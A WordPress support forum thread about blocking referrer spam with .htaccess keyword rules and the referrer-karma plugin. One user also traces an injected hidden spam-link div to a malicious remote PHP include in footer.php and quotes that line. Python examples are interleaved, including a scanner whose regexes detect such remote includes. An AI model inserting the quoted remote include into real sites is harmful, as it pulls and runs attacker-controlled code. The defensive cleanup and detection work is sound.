I am under phentermine attack? (49 posts)

  1. whooami
    Member
    Posted 2 years ago #

    And I still wonder how to do this using .htaccess.

    And I've explained repeatedly; you appear not to be reading.

    RewriteCond %{HTTP_REFERER} ^(.*)pill(.*)$ [NC]

    catches ANY referer with the string pill in it.

    RewriteCond %{HTTP_REFERER} ^(.*)phent(.*)$ [NC]

    catches any string with the partial match phent in it.

    RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC]

    catches any string with the word mortgage in it.

    Thusly,

    RewriteCond %{HTTP_REFERER} ^(.*)pill(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)phent(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC]
    RewriteRule ^.* - [F]

    sends a 403 to any referer containing the string pill, phent, or mortgage.

    I've provided numerous examples, as well as links. I suspect you aren't reading, which doesn't help to motivate me to continue replying. Not to mention that we are 30-some odd posts into a thread, and it took "pulling teeth" to get even an acknowledgment of my suggestion.

  2. mwillems
    Member
    Posted 2 years ago #

    You are really grumpy, aren't you? Of course I am reading. The question was "should I really kill ALL mentions of those words?"

    E.g. if I block pill, what if www.rape-and-pillage.com refers to me? If I block credit, what if www.credit.co.uk wants to use my services?

    FYI, my .htaccess now looks like this, and I have only just started: I suspect I will have 1,000 terms in there before I am done....;)

    RewriteCond %{HTTP_REFERER} ^(.*)phentermine(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)dietpills(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)credit-card(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)mortgage(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)las-vegas(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)casino(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)poker(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)black-jack(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)tramadol(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)xanax(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)vioxx(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)valtrex(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)celexa(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)paxil(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)hoodia(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)zyrtec(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)allegra(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)diflucan(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)cheap-soma(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)lipitor(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)hydrocodone(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)ambien(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)zoloft(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)valium(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)floxacin(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)erectile-dysfunction(.*)$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^(.*)adipex(.*)$ [NC]
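
Added example (not code from either poster's .htaccess): a small Python model of these rules that shows the substring semantics whooami describes, the false-positive case mwillems raises, and one way around it, an allowlist of known-good referer hosts checked before the term list. The term list and allowlist hosts are constructed for the example; `to_htaccess()` emits the equivalent mod_rewrite block, including the `RewriteEngine On` line that every rewrite rule in .htaccess needs.

```python
import re
from urllib.parse import urlsplit

# Constructed sample data for this example: a few of the thread's terms plus an allowlist
# of referer hosts that must never be blocked even though they contain a listed term.
SPAM_TERMS = ["phentermine", "pill", "mortgage", "credit", "casino"]
ALLOWED_HOSTS = ["credit.co.uk", "rape-and-pillage.com"]

def referer_host(referer: str) -> str:
    """Lower-cased hostname of a Referer URL ('' when there is none)."""
    return (urlsplit(referer).hostname or "").lower()

def host_allowed(host: str, allowed=ALLOWED_HOSTS) -> bool:
    """True for an allowlisted host or any subdomain of one (www.credit.co.uk)."""
    return any(host == a or host.endswith("." + a) for a in allowed)

def matches_term_list(referer: str, terms=SPAM_TERMS) -> bool:
    """Same test as one 'RewriteCond %{HTTP_REFERER} ^(.*)TERM(.*)$ [NC,OR]' per term:
    a case-insensitive substring match of ANY term anywhere in the referer URL."""
    ref = referer.lower()
    return any(t.lower() in ref for t in terms)

def decide(referer: str, terms=SPAM_TERMS, allowed=ALLOWED_HOSTS) -> str:
    """'allow' or 'block'. The allowlist is checked first, so the broad substring
    terms can stay broad while known-good referers such as credit.co.uk get through."""
    if host_allowed(referer_host(referer), allowed):
        return "allow"
    return "block" if matches_term_list(referer, terms) else "allow"

def to_htaccess(terms=SPAM_TERMS, allowed=ALLOWED_HOSTS) -> str:
    """Emit the equivalent mod_rewrite block: one alternation instead of a RewriteCond
    per term, negative conditions for the allowlist, and RewriteEngine On, without
    which RewriteCond/RewriteRule lines in .htaccess are silently ignored."""
    lines = ["RewriteEngine On"]
    for host in allowed:  # AND-ed negative conditions: allowlisted referers never reach [F]
        lines.append(f"RewriteCond %{{HTTP_REFERER}} !^https?://([^/]+\\.)?{re.escape(host)}(/|$) [NC]")
    alternation = "|".join(re.escape(t) for t in terms)
    lines.append(f"RewriteCond %{{HTTP_REFERER}} ({alternation}) [NC]")
    lines.append("RewriteRule ^ - [F]")
    return "\n".join(lines)

if __name__ == "__main__":
    for r in ["http://buy-phentermine.example/", "http://www.rape-and-pillage.com/x",
              "http://credit.co.uk/services", "http://example.org/blog"]:
        print(f"{decide(r):5s} {r}")
    print(to_htaccess())
```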

  3. Otto42
    Moderator
    Posted 2 years ago #

    Did you try the referrer karma plugin? It seems like it would work based on parsing the domain sending the referrer spam to you, looking for a link to your site.

  4. mwillems
    Member
    Posted 2 years ago #

    Otto,

    There appears to be a big battle going on here, see above.

    I tried the plugin, but it actually did not work for me, for some reason (database tables made, but activate it and I could not see my own web site, and yet no logging was done).

    Plus, one poster above thinks it is laughable and idiotic (etc.) to use that plugin; hence I tried .htaccess on his advice.

    Michael

  5. Otto42
    Moderator
    Posted 2 years ago #

    Well, the referrer karma thing is a bit more robust and might take care of it in a more automatic fashion, but the .htaccess would be the best way if there was some way to block the requests without adding a ton of rules.

    I did notice this in the thread:

    AHA -- the string as suggested by the script was wrong: it was <?php include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php"); check_referrer(); ?>
    That should have read <?php include_once ("/blog/wp-content/referrer-karma.php"); check_referrer(); ?>

    Umm... No. The script gave you this code for a reason:
    <?php include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php"); check_referrer(); ?>

    To use it, you should modify Wordpress' index.php file (the one in the main blog directory) to have this at the top of the file:

    <?php
    include_once ("/var/www/html/willems.ca/blog/wp-content/referrer-karma.php");
    check_referrer();
    ... rest of index.php ...

    That is assuming that you put the referrer-karma into the wp-content directory of the website, of course. Using the wrong path like you did above would indeed kill your site. You really should use the full local path to the file.

    Alternatively, this would probably work as well:

    <?php
    include_once ("./wp-content/referrer-karma.php");
    check_referrer();
    ... rest of index.php ...

    The point being that you need to provide the location of the file either as an absolute path or a relative path. Either way.

  6. mwillems
    Member
    Posted 2 years ago #

    Ah.. while /var/... is not accessible from there.. if I am in /blog/, i.e. relative to www.domainname.ca, surely /blog/wp-content/referrer-karma.php should work?

    Anyway you are right, a relative link will work - best try that then.

    But if you both agree that .htaccess is the way to go.. how many drugs and scams can there really be?

  7. Otto42
    Moderator
    Posted 2 years ago #

    Ah.. while /var/... is not accessible from there.. if I am in /blog/, i.e. relative to www.domainname.ca, surely /blog/wp-content/referrer-karma.php should work?

    No, we're not talking about being relative to the URL. We're talking relative to the file system.

    The /var/whatever thing absolutely will work. Period. Using the correct absolute and full path to the file will allow it to find the file. Remember, this is a script running on your machine. It's not looking at URLs, it's looking at files.

    But if you both agree that .htaccess is the way to go.. how many drugs and scams can there really be?

    Lots. Which is why the referrer karma thing is a decent approach. It will examine all incoming referrers, and if they're faked (because the referring URL doesn't actually have a link to you on their site), then the domain gets blacklisted automatically. And none of the Wordpress stuff ever runs, because it just returns 403 from then on. The problem with this approach is that it still requires a database connection for each hit, so your server could be impacted a lot more than the .htaccess approach would be.
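
Added example, a reimplementation of the scheme Otto describes rather than the plugin's own code: the referring page is fetched and checked for a link back to the site; a referer that never links back is blacklisted and answered with 403 before WordPress runs. The fetch function is injected and the referring pages are constructed so it runs offline; treating an unreachable page as not-spam is this example's own assumption, not something the thread states.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

def norm_host(host) -> str:
    """Lower-case a hostname and drop a leading 'www.' so both spellings compare equal."""
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

class LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def page_links_to(html: str, my_host: str) -> bool:
    """True if the page contains at least one <a href> whose host is my_host."""
    collector = LinkCollector()
    collector.feed(html)
    return any(norm_host(urlsplit(h).hostname) == norm_host(my_host) for h in collector.hrefs)

class ReferrerKarma:
    """Referer verification as post 7 describes it (a reimplementation, not the plugin)."""
    def __init__(self, my_host: str, fetch):
        self.my_host = my_host
        self.fetch = fetch          # callable url -> html or None; injected so this runs offline
        self.blacklist = set()      # stands in for the plugin's database table

    def check_referrer(self, referer: str) -> int:
        """HTTP status to send: 200 = let WordPress run, 403 = refuse before WordPress loads."""
        host = norm_host(urlsplit(referer).hostname)
        if not host or host == norm_host(self.my_host):
            return 200              # direct visits and internal navigation
        if host in self.blacklist:
            return 403              # known fake: no fetch, no database-heavy WordPress request
        html = self.fetch(referer)  # the outbound fetch is the cost (and SSRF surface) of this scheme:
        if html is None:            # in production restrict it to http(s), with a timeout and size cap
            return 200              # unreachable page: fail open rather than blacklist (assumption)
        if page_links_to(html, self.my_host):
            return 200
        self.blacklist.add(host)    # the referer never linked to us: fake, block from now on
        return 403

# Constructed referring pages so the example runs without network access.
PAGES = {
    "http://legit.example/post": '<p>see <a href="http://www.willems.ca/blog/">this blog</a></p>',
    "http://buy-pills.example/": '<a href="http://other.example/">unrelated</a>',
}
```

Usage: `ReferrerKarma("willems.ca", PAGES.get).check_referrer(url)` returns 200 for the legitimate referer and 403 for the fake one; a second hit from the fake host is refused without fetching.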

  8. mwillems
    Member
    Posted 2 years ago #

    That makes sense on all counts. And since server load is the big issue, perhaps I will start with .htaccess, and go to the referrer karma if I still see an issue.

    I have enabled .htaccess (allowing "all" in httpd.conf) and written in a long .htaccess file. (Not sure if it is working yet: if I add my own domain name as a forbidden referer keyword, it still allows me to go to my site by clicking on my site - though maybe that is different)

    Thanks all for your help.... truly appreciate it.

  9. Otto42
    Moderator
    Posted 2 years ago #

    Don't forget that last line with the [F] in it. That's the critical part.

    RewriteRule ^.* - [F]

  10. mwillems
    Member
    Posted 2 years ago #

    That's there, but it does not work. I am doing something stupid - not the first time I am sure :-)

  11. al-zarwani
    Member
    Posted 2 years ago #

    Apologies if I'm posting this in the wrong place, but this was the closest thing I could find searching for a thread that answered my question.

    I've just noticed that someone has managed to insert a hidden div on my WP blog crammed with links to Xanax and Cialis and so forth. The code looks like this:

    <div id="goro"><a href="http://damm.bloomu.edu/mediawiki/?q=1863" title="Cheap Phentermine C O D">Cheap Phentermine C O D</a><br><!-- ETC ETC ETC for pages -->

    I'm using the Cutline Theme, but that doesn't seem to be the source of the hole. If I switch themes (to Hiperminimalist), the SPAM code still appears.

    I've gone hunting in the code for the template pages, and haven't found anything. Searching all the Wordpress pages seems like a daunting task, and blocking terms in the htaccess seems like much more effort than I'm willing to put in.

    Would Referrer Karma work for me? I used Spam Karma for comment SPAM, with mixed results.

  12. moshu
    Member
    Posted 2 years ago #

    Check the main index.php (short and sweet) in your WP root directory.

    If it's there - somebody gained access to your site: either through your files or somewhere else on the server.

    Make sure you do NOT have writable files (chmod 666) on your blog.
    You may also want to read: http://codex.wordpress.org/Hardening_WordPress

  13. al-zarwani
    Member
    Posted 2 years ago #

    Thanks very much! I checked the index, and it's clean. Which is a bit of a relief, I guess. I'll sift through the guide to hardening Wordpress. Thanks for the link.

    It looks like the files in my Wordpress directory have permissions set to 755. Is that OK?

    Appreciate your help. Should I report this to my hosting company?

  14. moshu
    Member
    Posted 2 years ago #

    Yes, reporting always should be the very first thing!

    Permissions: folders 755, files 644.

  15. al-zarwani
    Member
    Posted 2 years ago #

    OK, thanks again. Permissions are set correctly. I had a look through the guide to hardening WordPress, which was very helpful and very well done.

    I'm pretty careful about security. It's possible someone left a keystroke logger on my Mac while I was out, but that strikes me as paranoid.

    I'm letting the hosting company (one of WP's recommended) know.

    BTW - I was glad to find the SSL WP-Admin plugin, but couldn't use it. Once activated, it redirected my login page to plugin.php. Deleted it from the directory and all's well again. Just to let you know, since it's recommended in the codex.

    Thanks again for your help. I sort of suspect the hosting company is going to blame a hole in WP first. If so, I'll post here again.

  16. al-zarwani
    Member
    Posted 2 years ago #

    Here's the response back from my hosting company:

    The programs that operate database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site.

    1. Set register_globals to OFF
    2. Turn off Display Error/Warning Messages. set error_display to ZERO
    3. Never run unescaped queries
    4. Validate all user inputs. Items on Forms, in URLS and so on
    5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
    6. Access Control. You don't want your users to have access to Admin functions or clean-up scripts.
    7. htaccess is your friend; use it to deny people (we also have an easy deny manager in the cpanel).
    8. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts; if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files. You can change your file extension by adding this line to the htaccess, or turn it on via the add type handler in the cpanel: (AddType application/x-httpd-php .php)
    9. To protect against SQL injection attacks: sometimes hackers will try to screw up your database by inserting SQL code into your form input fields. They can, for example, insert code that could delete all the data in your database!
    To protect against this, you need to use this PHP function:
    mysql_real_escape_string()
    This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
    Example:
    $name = $_REQUEST['name'];
    $safe_name = mysql_real_escape_string($name);
    Now you know the variable $safe_name, is safe to use with your SQL code.
    10. Keep the PHP code to yourself. If anyone can see it they can exploit vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server's document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.

    You can find more information about hardening your PHP scripts at: http://phpsec.org/projects/guide/ or http://www.hardened-php.net/
    and finally
    http://www.reaper-x.com/2007/09/01/hardening-wordpress-with-mod-rewrite-and-htaccess/

    Seems like a boilerplate response. I'm guessing that WP already takes most of these precautions, and I'm worried about messing around with WP's file structure or tampering with the code. I don't really know PHP.

    Based on this, does it sound to you like we have a hole in WP? I'm using the latest version.

  17. al-zarwani
    Member
    Posted 2 years ago #

    In the meantime, I did a little searching on Google and found the offending div id="goro" on another WP blog, http://nusratfateh.com/wp/?page_id=4, also in the footer. See also this unresolved thread from the WP forum. http://wordpress.org/support/topic/139455?replies=5

    What's going on? I'm in way beyond my depth. But I'd really like to get rid of this vandalism.

  18. al-zarwani
    Member
    Posted 2 years ago #

    FYI, problem solved. Removed this line of code from the footer file:
    <?php include('http://wordpress.net.in/statcounter.php'); ?>

  19. glemak
    Member
    Posted 1 year ago #

    Had the same unwanted spam link issue - removed this from footer.php: <?php wp_footer() ?>
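
Added example, not code from the thread or from WordPress: a scanner a site owner could run over wp-content to find the kind of line post 18 removed, an include of a remote URL (which PHP fetches and executes when allow_url_include is enabled), plus a generic display:none div heuristic for injected link blocks. The sample footer is constructed with a placeholder host; the scanner does not flag `<?php wp_footer() ?>`, which is WordPress's normal footer hook rather than injected code.

```python
import re
import tempfile
from pathlib import Path

# An include/require whose target is a URL: PHP fetches and executes remote code when
# allow_url_include is on, which is how the spam footer in this thread got in.
REMOTE_INCLUDE = re.compile(
    r"""\b(include|include_once|require|require_once)\b\s*\(?\s*['"]\s*(https?|ftp)://""", re.I)
# A div hidden from readers but not from search engines: where injected link farms usually sit.
HIDDEN_DIV = re.compile(r"<div[^>]*display\s*:\s*none", re.I)

def scan_php_source(text: str):
    """Return [(line_number, reason), ...] for suspicious lines in one PHP/template file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if REMOTE_INCLUDE.search(line):
            findings.append((n, "include/require of a remote URL"))
        if HIDDEN_DIV.search(line):
            findings.append((n, "display:none div in template"))
    return findings

def scan_tree(root: Path) -> dict:
    """Scan every .php file under root (e.g. wp-content/themes); {relative path: findings}."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

# Constructed sample theme files: a footer carrying a remote include like the one post 18
# removed (host replaced with a placeholder) and a clean template for comparison.
SAMPLE_FILES = {
    "themes/cutline/footer.php": "<?php wp_footer() ?>\n"
                                 "<?php include('http://spam-host.example/statcounter.php'); ?>\n"
                                 "</body></html>\n",
    "themes/cutline/header.php": "<?php wp_head() ?>\n<body>\n",
}

def demo_report() -> dict:
    """Write the constructed files into a temporary wp-content tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE_FILES.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo_report().items():
        for n, reason in hits:
            print(f"{path}:{n}: {reason}")
```

Obfuscated includes (concatenated or decoded strings) will not match, so treat a clean run as a pointer to look further, not as a full audit.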
